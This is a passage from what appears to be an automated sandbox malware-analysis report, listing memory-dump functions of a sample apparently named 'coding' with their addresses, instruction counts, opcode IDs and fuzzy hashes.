                                                                                          • Opcode ID: a371cdaca2ca48cffc8930cf966e617652db539d65481e7d5303d89f6d8e82f6
                                                                                          • Instruction ID: e1e0eb74b22dc4f02d970e65cdcf7a80853605d3a5e998ef9cbec24bde5819a1
                                                                                          • Opcode Fuzzy Hash: a371cdaca2ca48cffc8930cf966e617652db539d65481e7d5303d89f6d8e82f6
                                                                                          • Instruction Fuzzy Hash: 73513120A1E6C54FD386EB7818252767FE0EF87269F0800FAE08EC71D7DE484806C356
                                                                                          Function 00007FF848A70AD3 Relevance: 1.5, Strings: 1, Instructions: 219COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2944812682.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_7ff848a70000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 9L_^
                                                                                          • API String ID: 0-1679237627
                                                                                          • Opcode ID: faf36f0827b6c235e2b0d57738f50722f2cfb4f5e3bbd7003c8a2b667b30a656
                                                                                          • Instruction ID: d5f6c196f3f74c282caaa573b743c56b70cf3907803e7ce8bcdc5c1e3e57b31f
                                                                                          • Opcode Fuzzy Hash: faf36f0827b6c235e2b0d57738f50722f2cfb4f5e3bbd7003c8a2b667b30a656
                                                                                          • Instruction Fuzzy Hash: 48612825A0E52A6EE705FBBCE4421FC3BA0EF893A5F540537D01CC7293CE28A94697D5
                                                                                          Function 00007FF848A70E8E Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2944812682.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_7ff848a70000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4L_^
                                                                                          • API String ID: 0-2524838182
                                                                                          • Opcode ID: ae450f5b7a37b8d7c366371808265223eac35d3234884208ecc9b9342e6483bd
                                                                                          • Instruction ID: 9e9d24f4e2e85bea7b2c45c0197a539fe9980e633e7cccfd761424f69a48dad3
                                                                                          • Opcode Fuzzy Hash: ae450f5b7a37b8d7c366371808265223eac35d3234884208ecc9b9342e6483bd
                                                                                          • Instruction Fuzzy Hash: 02512921A0EA861FE356B77C98562B93FE1DF86660B0940FBD08DC7197DD5C9C438362
                                                                                          Function 00007FF848A71295 Relevance: .9, Instructions: 857COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2944812682.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_7ff848a70000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5352269b3f174d3e8f236a97e66b607e5c573f7cdbff17e13bcf2b48f6223125
                                                                                          • Instruction ID: c3ea1385e9461732893132c72b3d2ee4b835d833d686388f6c32c7b934c6fec9
                                                                                          • Opcode Fuzzy Hash: 5352269b3f174d3e8f236a97e66b607e5c573f7cdbff17e13bcf2b48f6223125
                                                                                          • Instruction Fuzzy Hash: 7021EA32D0E6955FE302FB7CD8560F97BB1EF42265F0805B7C088DB193DE2868069795
                                                                                          Function 00007FF848A70985 Relevance: .3, Instructions: 339COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2944812682.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_7ff848a70000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 69793992d71b91d9c5421ebd6097334d7868e419603c48bebf8d3161dcd3a8bf
                                                                                          • Instruction ID: 603a3a342ab4c836d976df9015f53c021cf4c338d2755a0dac4a4ca1bb8c401d
                                                                                          • Opcode Fuzzy Hash: 69793992d71b91d9c5421ebd6097334d7868e419603c48bebf8d3161dcd3a8bf
                                                                                          • Instruction Fuzzy Hash: B3A10226B0D9266EE701FBBCF8421FD7B60EF863A1B544577C148CA193CA24A48AC7D1
                                                                                          Function 00007FF848A709D3 Relevance: .3, Instructions: 313COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2944812682.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_7ff848a70000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5059419ef04577b75a8bfe98addbbb86e16ecf3f827d3d50f98c3eb0b21dc88b
                                                                                          • Instruction ID: caf8068d13d727fbc70b65123cd9c1951f11b87c87751c38659f750aac96b4b9
                                                                                          • Opcode Fuzzy Hash: 5059419ef04577b75a8bfe98addbbb86e16ecf3f827d3d50f98c3eb0b21dc88b
                                                                                          • Instruction Fuzzy Hash: 75910426B0992A6EE701FFBCF8061FD3BA0EF853A1B544577C148CB193CA25A486D7D1
                                                                                          Function 00007FF848A70A08 Relevance: .3, Instructions: 297COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2944812682.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_7ff848a70000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 747f2f41b4474b98122b571901169ccbcfb565d53eaf62e38bbab7f560210530
                                                                                          • Instruction ID: 59a42700c8916a5e813d5a01f05d98d2593875b2f180a78fc02c6f6f70bbd8ef
                                                                                          • Opcode Fuzzy Hash: 747f2f41b4474b98122b571901169ccbcfb565d53eaf62e38bbab7f560210530
                                                                                          • Instruction Fuzzy Hash: 2F811326B0992A6EE701FFBCF8021FD3BA0EF853A1B544577C148CB193CA24A486C7D1
                                                                                          Function 00007FF848A70A10 Relevance: .3, Instructions: 294COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2944812682.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_7ff848a70000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5d88f892e8ae4d2c11f88d174bbba9674326196dfb8d7a74d6a877ed39735b9d
                                                                                          • Instruction ID: 579c92a838da2d51411ba27cb5d156007ede709a3740d8874497b59d21f08873
                                                                                          • Opcode Fuzzy Hash: 5d88f892e8ae4d2c11f88d174bbba9674326196dfb8d7a74d6a877ed39735b9d
                                                                                          • Instruction Fuzzy Hash: 70810326B0992A6EE701FFBCF8061FD3BA0EF853A1B544577C148CB193CA24A486D7D1
                                                                                          Function 00007FF848A70A48 Relevance: .3, Instructions: 263COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2944812682.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_7ff848a70000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: de37a974eb2117ffc12a2ec4fbdb404ac8b16cda461f8f8f6d129cc24b6696c7
                                                                                          • Instruction ID: d599aa1eba3ee8796c74036e02d91979baa0db020d0ab8d279b728abd1126a3c
                                                                                          • Opcode Fuzzy Hash: de37a974eb2117ffc12a2ec4fbdb404ac8b16cda461f8f8f6d129cc24b6696c7
                                                                                          • Instruction Fuzzy Hash: 12714926B099266EE701FFBCF4421FD7BA0EF853A1B544577D148CB193CA24A486C7D1
                                                                                          Function 00007FF848A70638 Relevance: .1, Instructions: 138COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2944812682.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_7ff848a70000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dc959499a25b2eb49f0f99c1e53087490892c82a784f2c5e796206879ead4211
                                                                                          • Instruction ID: e4935f4819612f343a8c92696b4d9ee88fa04b6497fdde53fa7caf04abb621e0
                                                                                          • Opcode Fuzzy Hash: dc959499a25b2eb49f0f99c1e53087490892c82a784f2c5e796206879ead4211
                                                                                          • Instruction Fuzzy Hash: D731C021F1D9494FE798FB2C945A379B6D2EF89755F0401BAE00EC32D7DE689C428341
                                                                                          Function 00007FF848A70D21 Relevance: .1, Instructions: 128COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2944812682.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_7ff848a70000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 737c86869fb7dc35042e6e383e24287744b8573602e7832035cd74febb85968d
                                                                                          • Instruction ID: 57108818ed6185686d6f013acd8e03c9f108f1fc8e4305e2d36737abb176d806
                                                                                          • Opcode Fuzzy Hash: 737c86869fb7dc35042e6e383e24287744b8573602e7832035cd74febb85968d
                                                                                          • Instruction Fuzzy Hash: FA31B261F1990A5FE744FBBC581A3BD76D2EF98791F040276E00DC7287DE68AC018392
                                                                                          Function 00007FF848A70BD3 Relevance: .1, Instructions: 121COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2944812682.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_7ff848a70000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ff86f481deef2996812d02982337ed98d2dbd5f99ec0c9ffe5bd5ef48d946881
                                                                                          • Instruction ID: 8688c55c79b91d41ed51b56e826597e07ed5ef0ad1dccdfa27b626de9dc3d084
                                                                                          • Opcode Fuzzy Hash: ff86f481deef2996812d02982337ed98d2dbd5f99ec0c9ffe5bd5ef48d946881
                                                                                          • Instruction Fuzzy Hash: E741C270A1DA5E8FDB49FBB898662FD7BB1FF88341F500475D009D7286CE28A9058791
                                                                                          Function 00007FF848A70858 Relevance: .1, Instructions: 87COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2944812682.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_7ff848a70000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ad9ede2ae45023672595158f53b038cc392181e351050ff3ddd16c89fe32df24
                                                                                          • Instruction ID: 7f8cf9d58f02ea230a280450d3ddc233f222413450d83594034f7f70439748d3
                                                                                          • Opcode Fuzzy Hash: ad9ede2ae45023672595158f53b038cc392181e351050ff3ddd16c89fe32df24
                                                                                          • Instruction Fuzzy Hash: 3031B361A4E6695FD759EF3890A50ED3FB1EF8D201B8054B6D818C7387CD28AA05C7D1
                                                                                          Function 00007FF848A70870 Relevance: .1, Instructions: 76COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2944812682.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_7ff848a70000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 10fb5bfdfa8cde4d65df1f1f7779b2881fdbf025581063adf2091bfe11362607
                                                                                          • Instruction ID: d4d4c1c6aab1b939a32445c51e868152951cb673de82e962b39eb8e9893e1f65
                                                                                          • Opcode Fuzzy Hash: 10fb5bfdfa8cde4d65df1f1f7779b2881fdbf025581063adf2091bfe11362607
                                                                                          • Instruction Fuzzy Hash: 6121D371A5AA695FD759EF3890A94ED7FB1FF8D201BC054A5D818C338BCD28AA00C7D1
                                                                                          Function 00007FF848A722C1 Relevance: .0, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2944812682.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_7ff848a70000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c152b2ebc6c0a59721a1a9837ef601cce3074767e203bebf004162b9075bbf2a
                                                                                          • Instruction ID: 36900b6bd99eda77c7bf6600b62582c255856de0018cd60f27d457199a1f7bf9
                                                                                          • Opcode Fuzzy Hash: c152b2ebc6c0a59721a1a9837ef601cce3074767e203bebf004162b9075bbf2a
                                                                                          • Instruction Fuzzy Hash: F801491090EBD10FE786F73818560757FF0DF95285F0804BAE8D9C7097D948DA849397

                                                                                          Executed Functions

                                                                                          Function 00007FF848A31719 Relevance: .7, Instructions: 697COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.3268317887.00007FF848A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_7ff848a30000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 569a4d5f00ba09fb5763d6f4b9fa55f652231d51ee4809c3321017c7c19d429e
                                                                                          • Instruction ID: 45c769f4206d2e73732de23c16ffa0adaf4c99a8ccba9aec324b45c909a3880e
                                                                                          • Opcode Fuzzy Hash: 569a4d5f00ba09fb5763d6f4b9fa55f652231d51ee4809c3321017c7c19d429e
                                                                                          • Instruction Fuzzy Hash: 8D22B660E1D9495FE798FB38945A7B977E2FF88780F84057AE40EC32C6DE68AC018751
                                                                                          Function 00007FF848A320F1 Relevance: .2, Instructions: 211COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.3268317887.00007FF848A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_7ff848a30000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 99683af8ed065f0abdba326cecc860d1a185ad05310f50674429a19a5e4865a3
                                                                                          • Instruction ID: d21e807559db3301d0b010f485613f185487c545c20a5f5709bf96f601f5bc5e
                                                                                          • Opcode Fuzzy Hash: 99683af8ed065f0abdba326cecc860d1a185ad05310f50674429a19a5e4865a3
                                                                                          • Instruction Fuzzy Hash: 69511020A1E6C55FD787AB7858652767FE5DF8726AF0800FBE089C71D7DE480806C356
                                                                                          Function 00007FF848A30AD3 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.3268317887.00007FF848A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_7ff848a30000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 9P_^
                                                                                          • API String ID: 0-1898675183
                                                                                          • Opcode ID: 8d5a62ab18993c0474cc4a515bc97cba7461a6eaa82d09a5d0e147563de7851b
                                                                                          • Instruction ID: f4e269fcf2744e301191b282178071696ee487ba8fddb9a96f5c5c371819d891
                                                                                          • Opcode Fuzzy Hash: 8d5a62ab18993c0474cc4a515bc97cba7461a6eaa82d09a5d0e147563de7851b
                                                                                          • Instruction Fuzzy Hash: 8E61F426A0E51AAFE705FBBCE4426FD37A4EF84364B444577D41CC7283CE68684687A4
                                                                                          Function 00007FF848A30E8E Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.3268317887.00007FF848A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_7ff848a30000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4P_^
                                                                                          • API String ID: 0-2202116914
                                                                                          • Opcode ID: da3f737735853481a970fde4500e478d94b18b687b4bedf230203fc2235842c1
                                                                                          • Instruction ID: 941d26834f3eeb46e4a9b44a68b049ed0f5fff9e4b5e1bed45c3be024f71c435
                                                                                          • Opcode Fuzzy Hash: da3f737735853481a970fde4500e478d94b18b687b4bedf230203fc2235842c1
                                                                                          • Instruction Fuzzy Hash: B3512321A0EA861FE396B77C98562B93FE1DF86660B0940FBD08CC71A7DD5C5C428362
                                                                                          Function 00007FF848A31295 Relevance: .9, Instructions: 858COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.3268317887.00007FF848A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_7ff848a30000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: da49d1ac8881d5c129b2f49ca355cb0ef026424f2283d3496a13c1b8f0285347
                                                                                          • Instruction ID: b26b855e1b43f0c112e4b31377c964a521e1427a3deed0613db77b99d617754c
                                                                                          • Opcode Fuzzy Hash: da49d1ac8881d5c129b2f49ca355cb0ef026424f2283d3496a13c1b8f0285347
                                                                                          • Instruction Fuzzy Hash: 4721EA32D0D6965FE305FBBCE8664F97BB0EF81254B0805B7D088DB193DE1858458765
                                                                                          Function 00007FF848A30985 Relevance: .3, Instructions: 346COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.3268317887.00007FF848A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_7ff848a30000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 07504d97f5b6d5b2be9185ee924716909273f318ae2bbc9a8c1bbdae09ba74a6
                                                                                          • Instruction ID: 2521c97c8224c510bbe72df0fde3bbe152dfb867825a206bf5f5e52975302063
                                                                                          • Opcode Fuzzy Hash: 07504d97f5b6d5b2be9185ee924716909273f318ae2bbc9a8c1bbdae09ba74a6
                                                                                          • Instruction Fuzzy Hash: FAA1F13AA0D566AFE701FBBDF8416FD3BA4EF85260B444577D148CB183CA24648AC7E0
                                                                                          Function 00007FF848A309D3 Relevance: .3, Instructions: 320COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.3268317887.00007FF848A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_7ff848a30000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fe0ccafd80e495cea5b540243146bf23ed8b26654fc84295e420efa41f9ee0af
                                                                                          • Instruction ID: f64304ecb5a387442c41e564db6818ff040ce83ea8f929c25d6fb50de84eaddd
                                                                                          • Opcode Fuzzy Hash: fe0ccafd80e495cea5b540243146bf23ed8b26654fc84295e420efa41f9ee0af
                                                                                          • Instruction Fuzzy Hash: 2E91E32AA0D526AEE700FBBDF8456FE3BA4EF84271B444577D148CB183CA646486C7A4
                                                                                          Function 00007FF848A30A08 Relevance: .3, Instructions: 305COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.3268317887.00007FF848A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_7ff848a30000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3cbdc26cb6eab7b8a0582d7399e105dcb3e00220de6c78a31ec1c9c8a53b0d23
                                                                                          • Instruction ID: e1d6f92d0ebf46b5760a24e6ef6f43d823847cb81a06e496b7255427fe99152a
                                                                                          • Opcode Fuzzy Hash: 3cbdc26cb6eab7b8a0582d7399e105dcb3e00220de6c78a31ec1c9c8a53b0d23
                                                                                          • Instruction Fuzzy Hash: 0C81F42AA0D526AEE704FFBDF8456FE3BA5EF84360B444577D148CB183CA646486C7A0
                                                                                          Function 00007FF848A30A10 Relevance: .3, Instructions: 301COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.3268317887.00007FF848A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_7ff848a30000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7b4fa464dd806e82f0b4d32ced4e3d2f7632de53211039b478910a27bdb57649
                                                                                          • Instruction ID: 9d959a083b48dc44462af60063cf9be75880abfc8765b08403aa076a44219fcd
                                                                                          • Opcode Fuzzy Hash: 7b4fa464dd806e82f0b4d32ced4e3d2f7632de53211039b478910a27bdb57649
                                                                                          • Instruction Fuzzy Hash: D481F436A0D526AEE700FFBCF4456FD3BA4EF84360B444577D148CB183CA646486C7A0
                                                                                          Function 00007FF848A30A48 Relevance: .3, Instructions: 270COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.3268317887.00007FF848A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_7ff848a30000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 262a93b9afbf2f616228ed06a74aceb8987cf5bc6cfd97cd2a671d3426303fa1
                                                                                          • Instruction ID: 702e55c2c0c56ef5880305608c181e0dd2578082a306af8ecb9e29dda486b71d
                                                                                          • Opcode Fuzzy Hash: 262a93b9afbf2f616228ed06a74aceb8987cf5bc6cfd97cd2a671d3426303fa1
                                                                                          • Instruction Fuzzy Hash: 6F71E33AA0D526AFE704FFBDF8466FD3BA5EF84260B444577D148CB183CA646486C7A0
                                                                                          Function 00007FF848A30638 Relevance: .1, Instructions: 138COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.3268317887.00007FF848A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_7ff848a30000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c123bd2d314d1aa74c7e76c08d8ed2a75a1ed7bef628fdff9e46fa12b775c68d
                                                                                          • Instruction ID: 2fb073735a51715035cd40667a736e2101c87e4f7eab45839ccbecd460c8b7ec
                                                                                          • Opcode Fuzzy Hash: c123bd2d314d1aa74c7e76c08d8ed2a75a1ed7bef628fdff9e46fa12b775c68d
                                                                                          • Instruction Fuzzy Hash: 8D31D031F1DA495FE798FB2C946A379A6D2EF88755F0401BAE00EC32D7DE689C428341
                                                                                          Function 00007FF848A30D21 Relevance: .1, Instructions: 128COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.3268317887.00007FF848A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_7ff848a30000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cefcacf8df1e740364fb18d1ac5035915e2038470db8107fb9bf40b219a9c87d
                                                                                          • Instruction ID: 7251e177abbe52ee60164a5f8605c6998d40695484e3951227e491fe56842ccc
                                                                                          • Opcode Fuzzy Hash: cefcacf8df1e740364fb18d1ac5035915e2038470db8107fb9bf40b219a9c87d
                                                                                          • Instruction Fuzzy Hash: F131C461F1D90A5FE744FBBC581A3BD76D2EF98791F040276E00DC7286DE686C418792
                                                                                          Function 00007FF848A30BD3 Relevance: .1, Instructions: 121COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.3268317887.00007FF848A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_7ff848a30000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 89485b4dbaabe75bd3a9e467d8f2d95d099e549bf514389eb5e8448fb9f4d739
                                                                                          • Instruction ID: 16a22c2f5befbc0f1dc3102f87d5b717c9022be78951482d6cbdc09048f17e52
                                                                                          • Opcode Fuzzy Hash: 89485b4dbaabe75bd3a9e467d8f2d95d099e549bf514389eb5e8448fb9f4d739
                                                                                          • Instruction Fuzzy Hash: 9A41AC70A1DA4A9FEB85FB78D8666BD7BB1FF88300F90047AD009D7286CE6869058751
                                                                                          Function 00007FF848A30858 Relevance: .1, Instructions: 87COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.3268317887.00007FF848A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_7ff848a30000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d308997fdf2f590774a0c4fb4d6e5231cab2f25a6df30dbdae7da38c8a42cc86
                                                                                          • Instruction ID: 5403ff0b803a2185af8436e28e456f80b06d569634d3e94855b8623734c782fb
                                                                                          • Opcode Fuzzy Hash: d308997fdf2f590774a0c4fb4d6e5231cab2f25a6df30dbdae7da38c8a42cc86
                                                                                          • Instruction Fuzzy Hash: C331B33194AA89AFDB86EF3CD0A51AD7FF1EF85240FC045BAD818C7387DD686A018751
                                                                                          Function 00007FF848A30870 Relevance: .1, Instructions: 76COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.3268317887.00007FF848A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_7ff848a30000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7a1df307562afa4deb3b4de081e05e0e641131a9f23b51197c9fe60baaa09a76
                                                                                          • Instruction ID: 76be8af34d712a1bd54d195929f0cb470c949d5f909cae29ebceac0cbef9bd4a
                                                                                          • Opcode Fuzzy Hash: 7a1df307562afa4deb3b4de081e05e0e641131a9f23b51197c9fe60baaa09a76
                                                                                          • Instruction Fuzzy Hash: 4821A83195AA899FDB86EF38D0A55AD7FF1FF85240FC044A9D819C3397CD686A00C751
                                                                                          Function 00007FF848A322C1 Relevance: .0, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
